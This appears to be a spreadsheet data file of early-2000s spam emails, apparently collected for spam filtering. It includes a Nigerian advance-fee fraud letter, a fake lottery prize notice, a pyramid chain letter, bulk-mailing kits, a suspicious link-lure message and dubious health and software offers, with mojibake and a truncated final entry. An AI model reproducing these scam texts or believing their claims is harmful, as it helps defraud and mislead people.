http://www.centralremovalservice.com/cgi-bin/poker-remove.cgi
(I3-SS3)
-- 
Irish Linux Users' Group Social Events: social@linux.ie
http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">OFFICE OF:EGNR. FEMI DANIEL
FEDERAL MINISTRY OF WORKS AND HOUSING
FEDERAL SECRETARIAT OFFICE COMPLEX
IKOYI-LAGOS.ATTN:,                  First, I must solicit your strictest confidence in this transaction, this is by virtue of itÂ’s nature as being utterly confidential and top secret as you were introduced to me in confidence through the Nigeria Chamber of Commerce and Industries.We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name.Please acknowledge the reciept of this letter using the above e-mail or the Alternative: femi1855@aol.com to reply me. Yours faithfully,Egnr. Femi Daniel.NB:Bank Account Details not necessary as preferred mode of payment is by draft or cheque. -- 
Irish Linux Users' Group Social Events: social@linux.ie
http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">
Hallo,
I found yours Email ID in Directoric.
I have been from Russian and for a man like you have I been lookink.
http://www.easygoingcompanion.com/?oc=6120.If you no want to hear from me again just reply and i no bother you again**
</t>
  </si>
  <si>
    <t xml:space="preserve">OFFICE OF:EGNR. FEMI DANIEL
FEDERAL MINISTRY OF WORKS AND HOUSING
FEDERAL SECRETARIAT OFFICE COMPLEX
IKOYI-LAGOS.ATTN:,                  First, I must solicit your strictest confidence in this transaction, this is by virtue of itÂ’s nature as being utterly confidential and top secret as you were introduced to me in confidence through the Nigeria Chamber of Commerce and Industries.We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name.Please acknowledge the reciept of this letter using the above e-mail or the Alternative: femi1855@aol.com to reply me. Yours faithfully,Egnr. Femi Daniel.NB:Bank Account Details not necessary as preferred mode of payment is by draft or cheque. -- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">WERKEN BIJ DE LOTTO,
41132, NL-1007 DB AMSTERDAM,
THE NETHERLANDS.
FROM: THE DESK OF THE DIRECTOR PROMOTIONS,
INTERNATIONAL PROMOTIONS/PRIZE AWARD DEPARTMENT,
REF: WBL/67-B773524441ATTN:	AWARD NOTIFICATION; FINAL NOTICEWe are pleased to inform you of the announcement
today, 17 th  SEPT.  2002, of 
winners of the WERKEN BIJ DE LOTTO/ INTERNATIONAL
PROGRAMS held on 5TH JulY 2002.You / your company, attached to ticket number
013-2316-2002-477, with serial 
number A025-09 drew the lucky numbers
37-13-34-85-56-42, and consequently won in 
category C.You have therefore been approved for a lump sum pay
out of US$1,500,000.00 in 
cash credited to file REF NO. REF:
WBL/67-B773524441. This is from total prize 
money of US$22,500,000.00 shared among the fifteen
international winners in the 
category C. All participants were selected through a
computer ballot system 
drawn from 30,000 names from Australia, New Zealand,
America, Asia, Europe and 
North America as part our
International Promotions Program, which is conducted
annually.CONGRATULATIONS!Your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program.We hope with a part of you prize, you will
participate in our end of year high 
stakes US$1.3 billion International lotto.To begin your claim, please contact your claims
officer immediately:JANSEN DAVIS
FOREIGN SERVICE MANAGER,
EUROLITE BV,
TEL: 31 205241510    
FAX: 31 205241590
EMAIL:eurolitebv1@theoffice.netFor due processing and remittance of your prize
money to a designated account 
of your choice. Remember, you must contact your
claims officer not later than 
SEPTEMBER 27 th, 2002. After this date, all funds
will be returned as unclaimed.NOTE: In order to avoid unnecessary delays and
complications, please remember 
to quote your reference number in every one of your
correspondences with your 
officer. Furthermore, should there be any change of
your address, do inform your 
claims officer as soon as possible.Congratulations again from all our staff and thank
you for being part of our 
promotions program.
Sincerely,THE DIRECTOR PROMOTIONS,
WERKEN BIJ DE LOTTO.
www.werken-bij-delotto.netN.B. Any breach of confidentiality on the part of
the winners will result to 
disqualification. Please do not reply this mail.-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">HelloYou may have seen this business before and
ignored it. I know I did - many times! However,
please take a few moments to read this letter.
I was amazed when the profit potential of this
business finally sunk in... and it works!With easy-to-use e-mail tools and opt-in e-mail,
success in this business is now fast, easy and
well within the capabilities of ordinary people
who know little about internet marketing. And the
earnings potential is truly staggering!I'll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value.AS SEEN ON NATIONAL TV:Making over half a million dollars every 4 to 5
months from your home.THANKS TO THE COMPUTER AGE AND THE INTERNET!
==================================================
BE AN INTERNET MILLIONAIRE LIKE OTHERS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mega bucks
with only $25 out of pocket cost".DUE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 PRINT THIS NOW FOR YOUR FUTURE REFERENCE ====
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$If you would like to make at least $500,000 every
4 to 5 months easily and comfortably, please read the
following...THEN READ IT AGAIN and AGAIN!!!$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$FOLLOW THE SIMPLE INSTRUCTION BELOW AND 
YOUR FINANCIAL DREAMS WILL COME TRUE, GUARANTEED!INSTRUCTIONS:=====Order all 5 reports shown on the list below =====For each report, send $5 CASH, THE NAME &amp; NUMBER OF THE
REPORT YOU ARE ORDERING and YOUR E-MAIL ADDRESS to the
person whose name appears ON THAT LIST next to the report.
MAKE SURE YOUR RETURN ADDRESS IS ON  YOUR ENVELOPE TOP
LEFT CORNER in case of any mail problems.===WHEN YOU PLACE YOUR ORDER, MAKE SURE ===
===YOU ORDER EACH OF THE 5 REPORTS! ===
You will need all 5 reports so that you can save
them on your computer and resell them.
YOUR TOTAL COST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Take this entire letter, with the modified
list of names, and save it on your computer.
DO NOT MAKE ANY OTHER CHANGES.Save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2.Those 100 people mail out 5,000 e-mails each for
a total of 500,000 e-mails. The 0.2% response to
that is 1000 orders for Report # 3.Those 1000 people send 5,000 e-mails each for a
total of 5 million e-mails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+ 3.....$5,000 + 4..... $50,000
+ 5.... $500,000 .... Grand Total=$555,550.00NUMBERS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
e-mails each or more?There are over 150 million people on the internet
worldwide and counting, with thousands more coming
online every day. Believe me, many people will do
just that, and more!METHOD # 2: BY PLACING FREE ADS ON THE INTERNET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orders.This will guarantee that the e-mail they send out,
with your name and address on it, will be prompt
because they cannot advertise until they receive
the report.===========AVAILABLE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
REPORT # 1: "The Insider's Guide To Advertising
for Free On The Net"Order Report #: 1 from
Rui Sousa Santos
P.O. Box 132
Taylors Lakes VIC  3038
Australia
 ______________________________________________________REPORT # 2: "The Insider's Guide To Sending Bulk
Email On The Net"Order Report # 2 from: 
Richard Moulton
P.O. Box 82
Hot Springs,MT 59845
USA
 ___________________________________________________REPORT # 3: "Secret To Multilevel Marketing On The Net"Order Report # 3 from: 
J.siden
krondikesvÃ¤gen 54 A
83147 Ã–stersund
Sweden
 _____________________________________________________REPORT # 4: "How To Become A Millionaire Using
MLM &amp; The Net"Order Report # 4 from: 
Francis Kidd
P.O. Box 209
Homestead,PA 15120
USA
 __________________________________________________REPORT # 5: "How To Send Out One Million Emails
For Free"Order Report # 5 From: 
M.J. Lee
P.O. Box 19
52 Victoria Drive
London SW19 6BD
United Kingdom
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do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internet."Fred Dellaca, Westport, New Zealand
=================================================ORDER YOUR REPORTS TODAY AND GET STARTED ON YOUR
ROAD TO FINANCIAL FREEDOM !=================================================
If you have any questions of the legality of this
program, contact the Office of Associate Director
for Marketing Practices, Federal Trade Commission,
Bureau of Consumer Protection, Washington, D.C.This message is sent in compliance of the proposed
bill SECTION 301, paragraph (a)(2)(C) of S. 1618. * This message is not intended for residents in the
State of Washington, Virginia or California,
screening of addresses has been done to the best
of our technical ability.*  This is a one time mailing and this list will
never be used again.slaxflhxbkltlrolpefciayxx
</t>
  </si>
  <si>
    <t xml:space="preserve">chaseYou are receiving this mailing because you are a
member of MyTotalEmail.com and subscribed as:JM@NETNOTEINC.COM
To unsubscribe 
Click Here
(http://admanmail.com/subscription.asp?em=JM@NETNOTEINC.COM&amp;l=MTE)
or reply to this email with REMOVE in the subject line - you must
also include the body of this message to be unsubscribed. Any correspondence about
the products/services should be directed to
the company in the ad.
%EM%JM@NETNOTEINC.COM%/EM%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</si>
  <si>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excluded by visiting HERE
michaell
</t>
  </si>
  <si>
    <t xml:space="preserve">Protect your financial well-being.
Purchase an Extended Auto Warranty for your Car today. CLICK HERE for a FREE no obligation quote.
http://ww3.onlineisbest.com/warranty/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http://ww3.onlineisbest.com/warranty/
---------------------------------------
To easily remove your address from the list, go to: 
http://ww3.onlineisbest.com/stopthemailplease/
Please allow 48-72 hours for removal.
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,I'm a college dropout.  I work about two hours a day.  
I'm ambitious, but extremely lazy, and I make over 
$250,000 a year.  Are you curious yet?In a minute I'm going to tell you my secret,
it's the dirty little secret of the Internet ...You've probably heard stories about people making
whopping huge money online, but you thought they 
were the big corporate execs, famous programmers, or
boy-geniuses.Well, grasshopper, think again ...It's people like you and me that are making the real
money.  Yep, people like YOU AND ME!Ever since the "dot com bubble" burst in 1999, small-time
entrepreneurs are getting richer while the Fortune 500 
companies look for bankruptcy lawyers.Today small business owners and ordinary folks 
like you and me can use the web to achieve complete 
financial freedom with NO INVESTMENT and very little 
work.  How?  By learning the most profitable marketing 
technique ever created - it's called BULK EMAIL.If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ZERO!Stop paying those outrageous auction listing fees when
hardly anyone sees your ad!Imagine that you have a decent product with a 
profit margin of $20.00 on each sale.  If you send 
an email ad to 500,000 people, and only one person 
in a thousand actually places an order, then you just 
generated 500 orders and made $10,000 in a few hours 
of work.  It's that simple ...All you have to do is convince ONE PERSON OUT OF A
THOUSAND to buy your stuff and you're FILTHY RICH.The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for?!I'm going to ask you four simple questions.  If you answer
YES to all of them, then I can almost promise that you
will make at least $100,000 using bulk email this year.Here goes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grind!All you need is ambition and commitment.  This
is no "get rich quick scheme".  You have to work
to make big bucks, but ANYONE - and I mean ANYONE - can do 
it.You're probably wondering if it's hard to get started.  
Don't worry, it's not! I will show you step-by-step 
how to start your first email campaign and how to
build a booming online business.  You'll be generating 
orders - AND MAKING MONEY - in less than seven days.Okay, so what if you don't have anything to sell?No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...I personally guarantee that you will start your own 
bulk email campaign less than a week after reading 
the Bulkbook!  I'll give you a toll-free phone number 
to reach me 24 hours a day, seven days a week; 
where else will you find that level of service?!I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go.As a special bonus, you'll recieve a FREE copy 
of our STEALTH MASS MAILER, a very powerful bulk 
email program which retails for $49.99! I'll even
include 7 million email addresses absolutely FREE
if you order NOW!Stop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THE BULKBOOK
Teaches you step-by-step how to become a high profit
bulk emailer.  Secret techniques and tips never
before revealed.** SEVEN DAYS TO BULK EMAIL SUCCESS
Provides detailed day-by-day instruction to start sending
your first email campaign in seven days.** 600 Email subjects that PULL LIKE CRAZY** EMAIL LIST MANAGER
Manage your email lists quickly and easily.  Very 
user-friendly, yet powerful, software.** STEALTH MASS MAILER
Software can send up to 50,000 emails an hour automatically.
Just load them in there and click SEND!** ADDRESS ROVER 98 and MACROBOT SEARCH ENGINE ROBOT
Extracts email addresses from databases and search engines
at speeds of over 200,000 per hour.** WORLDCAST EMAIL VERIFIER
Used to verify your email addresses that you extract to 
make sure they're valid.** EBOOK PUBLISHER
Easily publish your own e-books and reports for resale using,
you guessed it, bulk email!** SEVEN MILLION EMAIL ADDRESSES
This huge list will get you started bulking right away.
I harvested these addresses myself, the list is filled
with IMPULSE BUYERS ready to respond to your ads!If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effort?Remember, you will recieve a toll-free phone number
for 24 hour expert advice and consultation FROM ME
PERSONALLY.To order the Bulkbook right now for only $29.99 with 
a Visa or Mastercard, please click on the link below. 
This will take you to our secure server for order 
processing:http://cbphost.net/users/quiksilver/bulkbook.htmNote: The Bulkbook will be delivered electronically
within 24 hours. It is not available in printed form. ***********************************************************
Our company is strictly opposed to unsolicited email.
To be removed from this opt-in list, please send a 
request to "bulkexpert@yahoo.com"
***********************************************************
5906UuMo0-083oXzI3821cAvh4-032miqQ2111Hkix2-485El45
</t>
  </si>
  <si>
    <t xml:space="preserve">ATTENTION: This is a MUST for ALL Computer Users!!!*NEW-Special Package Deal!*Norton SystemWorks 2002 Software Suite -Professional Edition-Includes Six - Yes 6! - Feature-Packed Utilities
ALL For 1 Special LOW Price!This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diagnostics!6 Feature-Packed Utilities...1 Great Price!
A $300+ Combined Retail Value!YOURS for Only $29.99!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
</t>
  </si>
  <si>
    <t>****************************************************************
Do Not Reply To This Message To Be Removed. For easy removal from this mail list
please click here http://teenie4free.com/remove
****************************************************************
This email was sent to you because your email is part of a targeted
opt-in list. If you do not wish to receive further mailings from this offer,
please click above and enter your email to remove your email from future offers.
****************************************************************
Beaton Enterprises, 102 Jefferson Street, Zegema Beach, PA, 19104 215-828-5000
***************************************************************</t>
  </si>
  <si>
    <t xml:space="preserve">
Slim Factors
&lt;!--
.t {  font-family: "Times New Roman", Times, serif; font-size: 12px; color: #000000}
--&gt;Â 
This e-mail is intended to be a benefit to the recipient. 
      If you would like to opt-out and not receive any more click 
      here. Your address will be removed immediately. We sincerely apologize 
      for any inconvenience. This E-mail is not SPAM under the Federal Regulatory 
      laws of the United States. This message is being sent to you in compliance 
      with the proposed Federal Legislation for commercial e-mail (H.R.4176-SECTION 
      101 PARAGRAPH (e) (1) (A)) and Bill s.1618 TITLE III passed by the 105th 
      US Congress. This message is not intended for residents of WA, NV, CA, VA. 
      Screening of addresses has been done to the best of our technical ability. 
</t>
  </si>
  <si>
    <t xml:space="preserve">
Lose weight while building lean muscle mass  and reversing the
ravages of aging all at once
Human
Growth Hormone Therapy
Lose weight
while building lean muscle mass
 and
reversing the ravages of aging all at once.
Remarkable discoveries
about Human Growth Hormones (HGH) 
are changing
the way we think about aging and weight loss.Lose
Weight
Build
Muscle Tone
Reverse
Aging
Increased
Libido
Duration
Of Penile Erection
 New
Hair Growth
 Improved
Memory
 Improved
skin
 New
Hair Growth
 Wrinkle
Disappearance Visit
Our Web Site and Lean The Facts: Click Here
</t>
  </si>
  <si>
    <t xml:space="preserve">+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  Take Control of Your Computer With This Top-of-the-Line Software! +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++               
                 Symantec SystemWorks 2002
              -=Professional Software Suite=-
This Special Package Includes Six - Yes 6! - Feature-Packed UtilitiesALL for 1 Special LOW Price of Only $29.99!This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 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Does Your Computer Need an Oil Change
Do
      You Care About Your Computer?
SymantecSystemWorks
      2002 Professional
      Edition
From
      the Creators of the #1 Rated AntiVirus Software!
This
      UNBEATABLE software suite comes with EVERY
      program you'll ever need to answer the problems or threats that your
      computer faces each day of it's Life! Included in this magnificent deal
      are the following programs:
Norton
      AntiVirusÃ¿FFFF99 2002 - THE #1
      ANTI-VIRUS PROTECION EVER!Norton UtilitiesÃ¿FFFF99 2002
      - DIAGNOSE ANY PROBLEM WITH YOUR
      SYSTEM!
Norton GhostÃ¿FFFF99 2002 - MAKES
      BACKING UP YOUR VALUABLE DATA EASY!
      Norton CleanSweepÃ¿FFFF99 2002 - ELIMINATES EXCESS
      DATA INSTANTLY!
      Norton WinFaxÃ¿FFFF99 Basic - TURNS YOUR
      CPU INTO A FAX MACHINE!GoBackÃ¿FFFFAE 3 Personal - HELPS
      PREVENT YOU FROM MAKING ANY MISTAKES!
*ALL
      this sells at the store for $99.95* Get it
      NOW for ONLY $29.99!with
      FREE SHIPPING!
CLICK
      HERE to order NOW!
Â Â Â Â Â Â Â Â 
Limited Time Offer. When we
run out it's gone, so get it while it's HOT!
CALL
      1-800-861-1481 &amp; ORDER NOW!
Â 
Â 
Your
      email address was obtained from an opt-in list. IEAC (International Email Abuse
      Council)Â Approved List
      Â Type Code - EASTUS-23t95d.Â Â If you wish to be unsubscribed from
      this list, please Click
      here. We do not condone spam in any shape or form. We appreciate your cooperation.
</t>
  </si>
  <si>
    <t xml:space="preserve">1) Claim Your $25 Kmart Gift Card
http://www.adclick.ws/p.cfm?o=320&amp;s=pk000012) Auto Loans, Fast Approvals for Any Credit!
http://www.adclick.ws/p.cfm?o=383&amp;s=pk13) Are You Paying Too Much for Auto Insurance - Find Out?
http://www.adclick.ws/p.cfm?o=334&amp;s=pk1Have a Wonderful Day,
PrizeMama.com------------------
You are receiving this email because you have opted-in to receive
email from publisher: prizemama.  To unsubscribe, click below:http://u2.azoogle.com/?z=93-1090346-62lLC4
-- 
Irish Linux Users' Group Social Events: social@linux.ie
http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">
Never Pay Retail!
Unleash 
                      your PC's Multimedia power TODAY! 
Compare 
                        and Save
Â Price
S&amp;H
Total
You 
                          Save
See 
                          for yourself
AMAZON
$29.99
$4.99
$34.98
70%
Click 
                          here
CDW
$29.21
$7.53
$36.74
69%
Click 
                          here
Office 
                          Depot 
$28.99
$5.95
$34.94
69%
Click 
                          here
Office 
                          Max 
$29.99
$3.99
$33.98
70%
Click 
                          here* 
                        Comparisons are based on similar model from leading merchants. 
*Microsoft 
      WindowsÂ® approved and certified compatible with all major voice recognition 
      software.
Â   
Unleash 
                  your PC's Multimedia power TODAY with the 
                  LABTECï¿½ PATENTED NCAT2 noise cancelling-amplification 
                  technology!              Use your PC for long distance calls and SAVE 
              BIG! Activate your PC and all your programs USING 
              YOUR VOICE!Video Conference with your friends IN REAL TIME! Send VOICE 
              EMAIL or Chat worldwide over the Internet, LIVE! - even 
              record your voice &amp; conversations LIKE THE PRO'S.
 This is 
                    THE best headset for your PC by the undisputed industry 
                    leader, LABTECï¿½ - Producing unmatched sound quality, 
                    superior to any headset you've ever owned! The ultimate 
                    in style and quality. Get yours today while they last! FAQ's
You can't get a better Headset 
              -- at a better price -- anywhere else! 
              You pay only: $8.99Â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http://www.frugaljoe.com/unsubscribe.php?eid=389099\~moc.cnietonten^^mj\~1754388\~12a1
</t>
  </si>
  <si>
    <t xml:space="preserve">================This Is Definitely the Answer We All Have Been Waiting For===============Every once in awhile, something comes along that you just know, from the people involved, from the features, or just from gut-feeling, that it's going to be very special, something with huge potential and hope. When you know it, it rests deep in your bones, and it's hard not to get overly excited and scream it to the world, which is why I'm writing you today. Although this program is launching with all the potential of being as big as anything on the Internet, and you will soon see it advertised and promoted everywhere you go, I would like to give you an opportunity to get in early before the masses. Traditionally, there have been a couple of flaws to any MLM (multi-level marketing for you newcomers) that have made it difficult for programs to last after the initial hoopla. Today, we have launched the solution to those problems, the newest and most innovative system ever to hit Multi-level Marketing. With a new software system and an ingenious payplan, combined with a 100% payout, everyone comes out a winner. 
The truth is, you've got to see it to believe it, so rather than feed you a lot of hype and tell you this is the miracle you've been looking for, the magic link that will end all your problems, or a lot of other things you don't need to hear, I'm just going to make you a very simple offer. Email me with 'Send Link' in the subject line to:  itshappening@mail2world.com  and I will provide the link so you can take a test drive, absolutely risk-free. You can get a birds-eye inside look, revealing the inner-workings of this revolutionary new discovery in online income opportunities. Should you decide you like what you see, you will have the option of activating your position, but that is completely at your option. This isn't a trick, I'm just so convinced that this is such a sound program and unique but solid opportunity that I don't want you to miss out on the chance to get an early position. With an explosive launch, positions will be filling up rapidly, and you have before you a chance to explore the program before diving in head first. If you're one of those cautious people (and who isn't these days on the Internet), that likes to "look before you leap" then here is your chance. Thank you for your time, and I hope you discover why we're all smiling!!
Please do not treat this message as spam. I am a professional and very successful networker with a data base of 100,000. I was pursueded to purchase this list containing 200,000 names of individuals, which is guaranteed to include only those people who have given their consent to receive information. I have not used this means of marketing before and frankly I am dubious about its validity. However, having spent an arm and a leg purchasing it I'm initially sending this message to just a small number of the email address's (2,000) to guage results. If you want more information I will happily supply the link without any obligation. But if its of no interest or you take exception to receiving this mail then please accept my apologies for the intrusion and delete the message immediately. As this is a one time mailing there is no need to respond with 'remove'. Thank you. 
</t>
  </si>
  <si>
    <t xml:space="preserve">FREE* Liz ClaiborneÂ® Fragrance For The FallCongratulations JM@NETNOTEINC.COM!
Dear JM@NETNOTEINC.COM,
You've been selected
to receive a bottle of Liz ClaiborneÂ® fragrance - FREE*.
Perfect to wear for any occassion, Liz ClaiborneÂ® is a light floral fragrance with just a hint of fresh citrus and mandarin - you'll love it for the  Fall Season!Â  Click here now and we'll send this refreshing scent right out to you.
With only a few
bottles on hand, I know they won't last long. Guarantee your own good fortune - and click here to claim your very own bottle of Liz ClaiborneÂ® fragrance.JM@NETNOTEINC.COM act now and click here for a one time only chance!
Sincerely,
Shannon Jones
P.S. Please feel
free to forward this great offer to a friend! Special $1 Store on Thank-youGift has great products at an amazing price. Guaranteed first quality 100%. Satisfaction guaranteed or your money back. Â Visit Thank-youGift to get in  on all the bargains.
Visit Milesource.com - Get miles for just being online! A completely FREE, no obligation program that rewards members for doing the things you already do. Get FREE movie tickets, FREE videos, FREE gifts, even FREE airline tickets just for researching, reading the news, catching up on sports and shopping, even playing games! Visit Milesource.com NOW!
*All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 and Washington.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</si>
  <si>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
MarketingonTarget.com has teamed up 
                  with FoundMoney to help you locate and claim your lost CASH.
                  The amount on that check, OR MORE, literally be YOURS for 
                  the claiming. 
                  Â  This is not a contest or a promotion. FoundMoney is a search service dedicated to putting 
                  UNCLAIMED MONEY together with its rightful 
                owners.
There are 31 
                  million North American people eligible right now to claim unknown 
                  cash windfalls. The search is Fast, Easy and GAURANTEEDÂ Over  BILLION is 
                  sitting in our database alone, which contains bank and government accounts, wills and estates, insurance settlements etc.Since 1994, our Web site 
                  has reunited millions upon millions of dollars with thousands 
                  of rightful owners -- who didn't even knowÂ  they 
                  had money waiting for them.Â 
Click here 
                  NOW or on the link below to find out -- in seconds -- if there 
                  is money waiting to be claimed in your family name or that of 
                  somebody you know. The INITIAL SEARCH IS 
FREE.
YOU HAVE NOTHING 
                  TO LOSE ....Â TRY 
                  FOUNDMONEY TODAYÂ 
CLICK HERE NOW!
Sincerely,LinkGift.com
                  Â 
Â 
You received this email because you signed up at one of LinkGift.com's websites or you signed up with a party that has contracted with LinkGift.com. To unsubscribe from our email newsletter, please visit http://opt-out.linkgift.net/?e=jm@netnoteinc.com. 
</t>
  </si>
  <si>
    <t xml:space="preserve">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http://ter.netblah.com:27000So if you are looking to be employed at home, with a career that will 
provide you vast opportunities and a substantial income, please fill 
out our online information request form here now: http://ter.netblah.com:27000
To be removed from our list simply click on the link below now: http://ter.netblah.com:270001631Pl5
</t>
  </si>
  <si>
    <t xml:space="preserve">
Untitled
Would you like to advertise your website inexpensively?Would you 
like Double Opt-in Email for as little as $1 CPM (cost per 
thousand)?We have over 40 million Double Opt-in emails.* All Emails 
are Double Opt-In * Email contains only your advertisement* Email a Web 
Page (HTML) or Text Message* All Emails sent within 72 hours* Get 
Immediate ResultsCall 954.757.3869 for more infoMember 
Services -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Unsubscribe</t>
  </si>
  <si>
    <t xml:space="preserve">
Latest news and information
              Leasing Deal of the Year              Mercedes-Benz 
              E240 (2.6) Elegance AutoÂ                 Specification includes: Automatic, Metallic Paint, Alloy
Wheels, 
                Electric Windows, Remote Central Locking, Electric Folding 
                Mirrors, Trip computer, Air Conditioning, Headlamp Wash,
Rear 
                Head Restraints, Tinted Windows and Wood
TrimÂ Â£299.00 
                per month 2 years (3+23)
                Â£276.70
per 
                month
3 
                years (3+35)Used 2001 
                Registered 01 Â“YÂ”
&amp;Â  01 Â“51Â” 
                plates (sub12,000miles)                10,000 miles per year, PCP, PCH, Contract Purchase and
Finance 
                Lease are also available on request              Â 
Telephone: 01702 530174 Â Â Â  Fax:
01702 530200Email:
sales@sesystems.co.uk
</t>
  </si>
  <si>
    <t xml:space="preserve">1) Lose 22.5lbs in 3 weeks!
Flush Fat Away Forever! Free 30-Day Supply
http://www.adclick.ws/p.cfm?o=423&amp;s=pk192) Introducing Chase Platinum for Students
With a 0% Introductory APR
http://www.adclick.ws/p.cfm?o=421&amp;s=pk193) Access Your PC From Anywhere - Download Now
http://www.adclick.ws/p.cfm?o=425&amp;s=pk19Have a Wonderful day,
PrizeMama------------------
You are receiving this email because you have opted-in to receive
email from publisher: prizemama.  To unsubscribe, click below:http://u2.azoogle.com/?z=93-1090346-62lLC4
-- 
Irish Linux Users' Group Social Events: social@linux.ie
http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">NEED Health Insurance? 
 In addition to featuring the largest selection of major medical 
health plans from leading companies, our service also
offers a wide selection of quality dental plans.  You can obtain 
FREE instant quotes, side-by-side comparisons, the best available 
prices, online applications, and a knowledgeable Customer Care 
team to help you find the plan that is right for you.
If you would like more information please email
surefiremarketing@btamail.net.cn?subject=healthinsurance
with "Send me health insurance info" in the body of the email
***************************************************************
If you do not wish to correspond with us, reply to 
surefiremarketing@btamail.net.cn  with remove as your subject. 
</t>
  </si>
  <si>
    <t xml:space="preserve">Hallo,Wir haben uns schon ziemlich lange nicht mehr gesehen, a ich ja nur noh Zeit fÃ¼r meine Freundin hatte. 
DAMIT ist jetzt SchluÃŸ.Alex hat mich sitzen lassen. Du erhÃ¤lst dieses Mail, weil ich Dir mal zeigen will, wie die Kleine wirklich so drauf ist.
Ich hab jetzt vor lauter Wut eine eigene Homepage gebastelt, da kannste mal was sehen:
http://alexandra.hobby.privatseite.toWie findest Du das ?lg
Petergcoakgwnibgafjecarccjbjiiqlluijseublait
</t>
  </si>
  <si>
    <t xml:space="preserve">Home PageIf this promotion has reached you in error and you would prefer not to
receive marketing messages from us, please send an email toÂ  cease-and-desist@mortgages101.net
Â  (all one word, no spaces) giving us the email address in question or call
1-888-748-7751 for further assistance.
Gain access to a Vast Network Of Qualified Lenders at Nationwide Network!
This is a zero-cost service which
enables you to shop for a mortgage conveniently from your home computer. Â  Our
nationwide database will give you access to lenders with a variety of loan programs that
will work for Excellent, Good, Fair or even Poor Credit! 
Â  We will choose up to 3 mortgage companies
from our database ofÂ  registered brokers/lenders. Each will contact you to offer you their best rate and terms - at
no charge.
Â  
Â You choose the best
offer and save -  Shop here for your next mortgage with just ONE
CLICK -  
Â  
Poor or Damaged Credit Is
Not A Problem! Consolidate &amp; pay
  off high interest bills for one lower monthly payment!Â Refinance (with or
  without cash out) to a low FIXED rate and payment!Get money to cover
  expenses for tuitions, home
  improvements, a new vehicle or vacations.
- Talk with up to three of our lenders today!
     VISIT OUR SITE HERE!    to get no-cost rate and payment quotes.Â 
  This service is completely FREE to you!
Â If this promotion has reached you in error
and you do not want to be contacted by us further, click here and let us know.Â  You
will not be bothered by us at this email address again.Â  Alternatively, you may send
an email to cease-and-desist@mortgages101.net
Â giving us the email address in question for IMMEDIATE attention.Â  Should you
wish to delete your email address from our mailing list by phone, please call
1-888-748-7751 and leave your email address - please spell your email address
clearly.Â Â  You may also mail a written request to us at Compliance, NMLN, 3053
Rancho Vista Blvd. #H-252, Palmdale, CA, 93551.Â  Your request will be honored within
24 hours of our receipt of your mail.Â  Failure to exclude yourself from our recurring
mailer via any of the lawful channels provided means that you have given your consent to
be included in our mailer.Â  You will continue to receive email as long as you do NOT
delete yourself from our mailer.Â  Please do not continue to receive unwanted email
after we have provided you with lawful means to be excluded.Â  We log, date and retain
ALL delete requests.Â  NO PART OF THIS STATEMENT MAY BE AMENDED OR ELIMINATED.Â 
Thank you.
Â  
</t>
  </si>
  <si>
    <t xml:space="preserve">Would You Like to Save up to 80
 Would You Like to
       Save up to 80%
      on Printer, Fax
      &amp;  Copier Supplies?
On
        Brands Like -&gt;
EPSON
Canon
HEWLETT
        PACKARD
Lexmark
&amp;
        more!
100%
        Quality Satisfaction Guarantee or Your Money Back!
FREE
        Same Day shipping on all US Orders*
We'll
        beat ANY Price on the Internet - GUARANTEED!**
Click
        Here to ORDER NOW!
OR
        Call us Toll-Free at 1-800-758-8084!Â 
Â 
*Free Shipping only on
        orders of $40 or more.**We beat any online retailer's price by 5%.
        Call us with the URL (Website) advertising the lower price and once we
        verify the price, we will beat it by 5%! (Must be same manufacturer)
You
        are receiving this special offer because you have provided permission to
        receive email communications regarding special online promotions or
        offers. If you feel you have received this message in error, or wish to
        be removed from our subscriber list, Click
        HERE . Thank You and we apologize for ANY inconvenience.
</t>
  </si>
  <si>
    <t xml:space="preserve">æ‚¨å¥½ï¼š
    å¦‚æžœæ­¤ä¿¡æ‰“æ‰°åˆ°æ‚¨ï¼Œæˆ‘ä»¬æ·±æ„ŸæŠ±æ­‰ï¼Œè¯·å°†æ­¤ä¿¡åˆ é™¤ã€‚
    å¦‚æžœæ‚¨éœ€è¦è¿›è¡Œä¼ä¸šç½‘ç«™æŽ¨å¹¿æˆ–è€…äº§å“ä¿¡æ¯å‘å¸ƒï¼ŒEMAILè¥é”€æ˜¯æ‚¨è¿›è¡Œç½‘ä¸Šç”µå­å•†åŠ¡
    ä¸å¯é¿å…çš„ä¸€é¡¹å·¥ä½œã€‚å…·CNNIC2002å¹´ä¹æœˆæœ€æ–°è°ƒæŸ¥25%çš„å®¢æˆ·äº†è§£æ–°ä¿¡æ¯çš„æ¥æºä¸ºEMAILï¼Œ
    EMAILå¹¿å‘Šè¥é”€æ­£æˆä¸ºæœ€å»‰ä»·å’Œæœ€å®žç”¨çš„æ–¹æ³•ã€‚
   ã€Šå…¨çƒEMAILåœ°å€é”€å”®ç½‘ã€‹3å¹´æ¥è‡´åŠ›äºŽä¸­å›½ç”µå­å•†åŠ¡çš„å‘å±•å’ŒæŽ¨å¹¿ï¼Œä¸ºå®¢æˆ·æä¾›ä¸åŒ
